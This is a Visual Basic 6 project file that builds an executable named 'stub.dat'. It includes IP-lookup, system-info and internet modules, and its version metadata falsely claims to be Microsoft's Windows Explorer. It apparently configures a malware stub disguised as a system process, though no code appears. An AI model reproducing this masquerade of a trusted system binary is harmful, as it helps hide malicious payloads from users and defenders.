Type=Exe
Form=Form1.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
Object={48E59290-9880-11CF-9754-00AA00C00908}#1.0#0; MSINET.OCX
Module=mSharedMemory; mSharedMemory.bas
Module=mTask; mTask.bas
Module=SysInf; Info.bas
Module=getip; GetIP.bas
Module=PropBagCompile; PropBagCompile.bas
IconForm="Main"
Startup="Main"
HelpFile=""
Title="explorer"
ExeName32="stub.dat"
Path32="..\.."
Command32=""
Name="explorer"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionComments="Made By Salar Zeynali - Salixem@Gmail.Com"
VersionCompanyName="Microsoft Corporation"
VersionFileDescription="Microsoft® Windows® Explorer"
VersionLegalCopyright="Microsoft®"
VersionLegalTrademarks="Microsoft® Windows® Operating System"
VersionProductName="explorer"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1
